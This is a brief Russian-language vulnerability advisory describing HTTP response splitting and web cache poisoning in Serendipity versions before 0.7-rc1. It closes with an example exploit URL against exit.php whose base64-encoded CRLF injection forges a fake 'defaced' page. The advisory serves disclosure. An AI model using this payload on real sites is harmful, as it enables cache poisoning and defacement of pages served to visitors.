Программа: Serendipity версии до 0.7-rc1
Удаленный атакующий может выполнить HTTP response splitting атаку.
Удаленный атакующий может изменить содержимое страницы с целью кеширования злонамеренного кода в одном из web кешей.
Уязвимость существует при обработке запрашиваемого URI в index.php и HTTP реферера в
'comments.php'.
Пример:
http://[target]/serendipity/exit.php?url=DQpDb25uZWN0a W9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aD
ogMA0KDQpIVFRQLzEuMCAyMDAgT0sNCkNvbnRlbn
QtTGVuZ3RoOiAyMQ0KQ29udGVudC1UeXBlOiB0ZXh
0L2h0bWwNCg0KPGh0bWw%2bKmRlZmFjZWQqPC9o dG1sPg%3d%3d